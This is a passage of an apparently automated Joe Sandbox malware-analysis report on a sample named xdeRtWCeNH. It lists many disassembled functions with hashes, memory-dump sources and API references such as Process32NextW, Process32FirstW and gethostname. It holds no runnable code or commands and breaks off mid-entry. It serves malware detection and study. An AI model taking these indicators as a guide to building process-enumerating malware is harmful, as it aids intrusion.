                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            • Opcode ID: 180cfe54d7b53b9a327c1f598b6155d536ddf577b101e75fa54820114f976fdd
                                                            • Instruction ID: b26c25defd6fec93fcdfaec3d310c28fbc6601ba82be82f0d404f0abd3e8abb6
                                                            • Opcode Fuzzy Hash: 180cfe54d7b53b9a327c1f598b6155d536ddf577b101e75fa54820114f976fdd
                                                            • Instruction Fuzzy Hash: 081138D719D2127CE50255A15B45AFA2A2EE6F3B30F308827F402D5462F2D1494B5061
                                                            Function 074A0EA2 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            • Opcode ID: a341658877b5561f47a288b7ab114e5a19930566dff16f294d2e29beda22e5c6
                                                            • Instruction ID: fad7bb47a9fc2df824f6b361ede53a603683360277cec411c1fb6a1c88904a3b
                                                            • Opcode Fuzzy Hash: a341658877b5561f47a288b7ab114e5a19930566dff16f294d2e29beda22e5c6
                                                            • Instruction Fuzzy Hash: 96113DEB25D2027DE40294551B50FFA2B2EE7E3730F308827F403D6452F2D1494B5071
                                                            Function 07470369 Relevance: 2.1, APIs: 1, Instructions: 561COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 9e33be4beb310f6f6f04e8a8b8fa83d8c3d2fc310d1009dd7bc99f3c23678536
                                                            • Instruction ID: aa739fc297c4fd9208fe42f72ba3c4b6079ade8a742842c91e12f80eeb0bc5fb
                                                            • Opcode Fuzzy Hash: 9e33be4beb310f6f6f04e8a8b8fa83d8c3d2fc310d1009dd7bc99f3c23678536
                                                            • Instruction Fuzzy Hash: 7AB103EB26E211BDB242C5856B54AFB676DE6D7330B318827F407D6622E3940F4BD131
                                                            Function 0747024A Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a2b3203dd6ad1e396a122f587be131cb18d98ab0ba3b93a844018ff5024408e
                                                            • Instruction ID: 3235082162168f659a00e14f8a17be982d6bf0b7c5faec873ecd778948934ea7
                                                            • Opcode Fuzzy Hash: 2a2b3203dd6ad1e396a122f587be131cb18d98ab0ba3b93a844018ff5024408e
                                                            • Instruction Fuzzy Hash: 33718EEB2AE121BD714281552F64AFB5B6EE1D7770B318827F803D6662E2D80F4F9071
                                                            Function 07470236 Relevance: 1.9, APIs: 1, Instructions: 375COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 38852fce712ef551f5bc9da0f36ca2ef9e1fcc1a8849a65aa2bfa5c0ef032856
                                                            • Instruction ID: f8c2fe07e08bb715d7f16e99f9639f8932e9e26b90dcb83cbf53758db8fddf08
                                                            • Opcode Fuzzy Hash: 38852fce712ef551f5bc9da0f36ca2ef9e1fcc1a8849a65aa2bfa5c0ef032856
                                                            • Instruction Fuzzy Hash: A7717BEB1AE121BD714281422F65AFB676EE1D7730B718827F807D6662E3D80F4B9071
                                                            Function 07470269 Relevance: 1.9, APIs: 1, Instructions: 361COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: d788ad58c6d2d14cddca48205ff801b24418d092d3a4215566385fd9501d564c
                                                            • Instruction ID: 9728421796542e4a08f263633bf9681e27e26b0a6edbd75ce95e863fb32dd5e1
                                                            • Opcode Fuzzy Hash: d788ad58c6d2d14cddca48205ff801b24418d092d3a4215566385fd9501d564c
                                                            • Instruction Fuzzy Hash: 7E618AEB1AE121BD714280412B64AFB5B6EE2D7730B318827F807D6662E2D80F4F9071
                                                            Function 0747027F Relevance: 1.9, APIs: 1, Instructions: 360COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4e91c231233f5b2ffc34d95eba3c56391652ccf82447ad1265f92e08ce037a68
                                                            • Instruction ID: dbbe8e442f0e15f58bafd8d9a951cdc40d786d1e6441d5bdb1a9798ec4c70af6
                                                            • Opcode Fuzzy Hash: 4e91c231233f5b2ffc34d95eba3c56391652ccf82447ad1265f92e08ce037a68
                                                            • Instruction Fuzzy Hash: 7B616AEB2AE121BD714280416F64AFB5B6EE1D7730B71C827F807D6662E2C84E4F9071
                                                            Function 07470291 Relevance: 1.9, APIs: 1, Instructions: 355COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: a843233abc1e73754e370d3557565cc08fba3185de0910ded4df4b050ba3a5b9
                                                            • Instruction ID: d4c73e95aa4a6b5ef2b2c8141852e507a9bdc8b121515b2b4dac4db69bb9e35b
                                                            • Opcode Fuzzy Hash: a843233abc1e73754e370d3557565cc08fba3185de0910ded4df4b050ba3a5b9
                                                            • Instruction Fuzzy Hash: E0616CEB2AE121BD714280412B65AFB576EE2D7730B718827F807D6562E3C84F4F9071
                                                            Function 074702B8 Relevance: 1.8, APIs: 1, Instructions: 350COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 30de792df9e430cead995eeceaefc6e12aecd05750ba2299a99fc2e80a29106f
                                                            • Instruction ID: caa80ee61d68cc1970779c812882237ef6b9e96b4cfeea0b9a6b81513fa9a75b
                                                            • Opcode Fuzzy Hash: 30de792df9e430cead995eeceaefc6e12aecd05750ba2299a99fc2e80a29106f
                                                            • Instruction Fuzzy Hash: 2A618EEB1AE121BD714280512B64AFB5B6EE1D3730B31C827F807D6562E2C84F4F9071
                                                            Function 074702D2 Relevance: 1.8, APIs: 1, Instructions: 344COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 9f7ef08df103c8be79aabe1e1efb1331943a9d60a14b913673b434758329429e
                                                            • Instruction ID: 276bd255a3541876c5bd91196841ce81b73faa4391f7a08dba0fe9fb18500d33
                                                            • Opcode Fuzzy Hash: 9f7ef08df103c8be79aabe1e1efb1331943a9d60a14b913673b434758329429e
                                                            • Instruction Fuzzy Hash: 50617DEB2AE221BD714280512B64AFB566EE1D3730B71C827F807D6562E3C84E4F9071
                                                            Function 074703A1 Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 320245422b141e5be0c9194b76a6b5233b3158a1d19b6be3f358c7d059b5adda
                                                            • Instruction ID: d069c9d3827fe8f4540cd536a21991433f737301a478b4e0235299bacf16dfba
                                                            • Opcode Fuzzy Hash: 320245422b141e5be0c9194b76a6b5233b3158a1d19b6be3f358c7d059b5adda
                                                            • Instruction Fuzzy Hash: 22519EEB2AE121BE714280552B64AFB5B6EE1D3730B31C827F807D5522F2C44E4F9071
                                                            Function 0747031B Relevance: 1.8, APIs: 1, Instructions: 324COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 8f22dba05ccf3d0e05e9e9b492335d850d74ae519099e45e0305aade43cd95ea
                                                            • Instruction ID: 83a357090b35c093e4d301903e4bc5f8c899958c0b749dcead89cf2ab4f26136
                                                            • Opcode Fuzzy Hash: 8f22dba05ccf3d0e05e9e9b492335d850d74ae519099e45e0305aade43cd95ea
                                                            • Instruction Fuzzy Hash: E9516DEB2AE121BD714280562F64AFB576EE1D3730B72C827F807D6566E2C84E4F9071
                                                            Function 0747032B Relevance: 1.8, APIs: 1, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: f80927f76143a95d6b2dec61a49c1ebee04324a080ebec4a8351bb3103e232ff
                                                            • Instruction ID: f4a2a207bd8135e75f3eded548a384a0d16cfa57c020c798abc288976170a488
                                                            • Opcode Fuzzy Hash: f80927f76143a95d6b2dec61a49c1ebee04324a080ebec4a8351bb3103e232ff
                                                            • Instruction Fuzzy Hash: 5C518CEB2AE121BD714281562F64AFB576EE1D3730B71C927F807D6522E2C84E4F9071
                                                            Function 07470346 Relevance: 1.8, APIs: 1, Instructions: 318COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: e5902a06c5f47f5a5eac86a8c22c1f7367457c96d7725cb83171627b613b8534
                                                            • Instruction ID: d5b26f54386e03e91f585942ec7858ad5c91e40eda9eb8e6dc1b58c33b7e159b
                                                            • Opcode Fuzzy Hash: e5902a06c5f47f5a5eac86a8c22c1f7367457c96d7725cb83171627b613b8534
                                                            • Instruction Fuzzy Hash: AB517DEB2AE121BD714281562F65AFB676EE1D3730B31C927F807D6562E2C80E4F9071
                                                            Function 0747037E Relevance: 1.8, APIs: 1, Instructions: 318COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4e6a4d8aec3fd07396753cdd1afc8844f7e23d20a74d60e8cd46e1a44b1b4769
                                                            • Instruction ID: 5d5afb98ad5a2ec6f3d22691d23f92887ce735973165f25278a3dc02e897ceea
                                                            • Opcode Fuzzy Hash: 4e6a4d8aec3fd07396753cdd1afc8844f7e23d20a74d60e8cd46e1a44b1b4769
                                                            • Instruction Fuzzy Hash: 605193EB2AE220BD7142C1552F65AFB6B6EE5D7730B31C827F807D6522E2840E4F9171
                                                            Function 074703E9 Relevance: 1.8, APIs: 1, Instructions: 304COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: f9cc600c024a1c34a3e36cf23aeb9c6b396765b33a7e71eecbb331e9047c4a6b
                                                            • Instruction ID: 2a148e333dab2990d3912045d71108bbb87220019228c8f7bec56e2e9576bd64
                                                            • Opcode Fuzzy Hash: f9cc600c024a1c34a3e36cf23aeb9c6b396765b33a7e71eecbb331e9047c4a6b
                                                            • Instruction Fuzzy Hash: 3B518FEB2AE220BD714281552F659FB5B6EE5D3730B31CC27F807DA526E2880E4F9171
                                                            Function 07470371 Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: a190b909f693294b39c0e805a297aef56f1cdf7090e35eae28cd0381064cfda2
                                                            • Instruction ID: eee4db3380016138eefc7ce51f7dcac819e48679298a7406a3656bc18c239ca9
                                                            • Opcode Fuzzy Hash: a190b909f693294b39c0e805a297aef56f1cdf7090e35eae28cd0381064cfda2
                                                            • Instruction Fuzzy Hash: 9E515DEB2AE221BD7142C1452F649FB576EE1D3730B71C827F807D6522E2884E4F9071
                                                            Function 074703D3 Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 219e40b2fe16792c0164cfefa6f4191d6afbd0157b548ba5e1964d23d7aaad5d
                                                            • Instruction ID: 4bc25ffcb4fc55b147edf3eaddbcf668341b3438449f40de9a2a4fdb85edb92d
                                                            • Opcode Fuzzy Hash: 219e40b2fe16792c0164cfefa6f4191d6afbd0157b548ba5e1964d23d7aaad5d
                                                            • Instruction Fuzzy Hash: 43515DEB2AE220BD714280556F649FB5B6EE1D3730B71C827F807D6526E2884E4F9071
                                                            Function 07470412 Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 31fd5351e0643a246ff0baafe3ac5eb243a2abb0c4b83f07dc38e9c6c5cb8228
                                                            • Instruction ID: 2b0a890c27241962c4b1984690f8597264e40a264f4e74575f6ca70feec242c6
                                                            • Opcode Fuzzy Hash: 31fd5351e0643a246ff0baafe3ac5eb243a2abb0c4b83f07dc38e9c6c5cb8228
                                                            • Instruction Fuzzy Hash: 26518DEB29E220BD7142C1556B649FB6B6EE5D3730B71C82BF807D6522E2880E4E9171
                                                            Function 0747043A Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 74ef59cab58e181b062802d40c9ed26ddc917633e7a12f0ead80bc0abc5efc41
                                                            • Instruction ID: 1258fcb064d44404f46307a8a9980b36c858f6475bc72ad41e39acaf79ecbe9f
                                                            • Opcode Fuzzy Hash: 74ef59cab58e181b062802d40c9ed26ddc917633e7a12f0ead80bc0abc5efc41
                                                            • Instruction Fuzzy Hash: 9C415EEB29E220BD7142C1556B64AFB676EE5D3770B71C82BF807D6512E2C80E4F9131
                                                            Function 074704D0 Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 111947452699e5e735c1f87088c2091a105725ed686deaeaca7a8aa6e262596d
                                                            • Instruction ID: 3e6797614d483a8ea23118fdcda7835a6ccb4398a52e7d6e2dcb40cfb272711b
                                                            • Opcode Fuzzy Hash: 111947452699e5e735c1f87088c2091a105725ed686deaeaca7a8aa6e262596d
                                                            • Instruction Fuzzy Hash: 9E417CEB29E220BD714281456F64AFB6B6EE1D3730B71C82BF807D6512E2C80E4F9031
                                                            Function 0747044F Relevance: 1.8, APIs: 1, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: d187e04fda54ccb5798815aae4b6583bc402422c05fed2e4277e8992e5fb426b
                                                            • Instruction ID: 6445384441e7cf3b252de47c64b7080ace358079d108eaf9eba936200e1c8be2
                                                            • Opcode Fuzzy Hash: d187e04fda54ccb5798815aae4b6583bc402422c05fed2e4277e8992e5fb426b
                                                            • Instruction Fuzzy Hash: 93416FEB19E220BD714281462F64AFB576EE1D3770B71C827F807D6622E2C80F4E9031
                                                            Function 07470458 Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 538e388e0a96e431a246752e645ffe8a9cbd14f7c1f26ee96c02ea6347cbcb2d
                                                            • Instruction ID: 43de7bc0b3955fe2a30c004a0facf7baff38afcc3f6eadc1f7033d77d30a0e11
                                                            • Opcode Fuzzy Hash: 538e388e0a96e431a246752e645ffe8a9cbd14f7c1f26ee96c02ea6347cbcb2d
                                                            • Instruction Fuzzy Hash: F7416DEB29E220BC714281466F649FB676EE5D3770B71C827F807D6512E2C80E4E9031
                                                            Function 07470469 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(0000B483,0000B483,?,?), ref: 07470486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597497521.0000000007470000.00000040.00001000.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7470000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 9be26cf9a7cb41efaaddba4a4620a1ec296efa17a763b5f577bcf8514c84f922
                                                            • Instruction ID: fb4c8cc2d28ab64d3f247230093a1b3901edf5ec1a2235529d7874398d96cc1f
                                                            • Opcode Fuzzy Hash: 9be26cf9a7cb41efaaddba4a4620a1ec296efa17a763b5f577bcf8514c84f922
                                                            • Instruction Fuzzy Hash: 8B415EEB25E220BD7142C1456F549FB676EE5D3770B71C82BF807D6616E3884E4E9031
                                                            Function 00774950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 00774AA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            • Opcode ID: 30b6fd0eeeb20191cee94b48c94dc11afc6985fb52e67f95b53d71d024390180
                                                            • Instruction ID: d73264c98a1efb0222c415d9c8e86da4961a53988c31245b9bbbf5dfe8ca3579
                                                            • Opcode Fuzzy Hash: 30b6fd0eeeb20191cee94b48c94dc11afc6985fb52e67f95b53d71d024390180
                                                            • Instruction Fuzzy Hash: 3951DFB16043409BEF309B65DD4972376E4AF45399F14893CEA8E866E1E77CEC44CB12
                                                            Function 0746034F Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 7391c0965b200c3c3ec35ea214b518f81c9b73813c9f22d0b3ba6bea47c66747
                                                            • Instruction ID: 379cbd4c48d2986cbbdd3922a914fb3b3c4fb54eb9cb987d361c19398dc417bd
                                                            • Opcode Fuzzy Hash: 7391c0965b200c3c3ec35ea214b518f81c9b73813c9f22d0b3ba6bea47c66747
                                                            • Instruction Fuzzy Hash: D431D3E75AC261BE726681412B5CDF61B1EE5E7330B358C27F407DA626E2844E8B0073
                                                            Function 0746035D Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 86e8e1b62a2122b91a255bfabb55ef3375ece22106dc46ef5254aa18ec2dfddd
                                                            • Instruction ID: f5f037d60ba618c69129c609be9d85e34e201731045200343ab56542736226ad
                                                            • Opcode Fuzzy Hash: 86e8e1b62a2122b91a255bfabb55ef3375ece22106dc46ef5254aa18ec2dfddd
                                                            • Instruction Fuzzy Hash: D431F6E75AC211BEB26685511B5CEF71B1EE5D7330B358C2BF407DA666E2844E8B0073
                                                            Function 074603A9 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 074603C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597480286.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7460000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a87bd2f6a3fb12ced7515f1b02158310a97dd9323ec23d9e048d1918f67bae2f
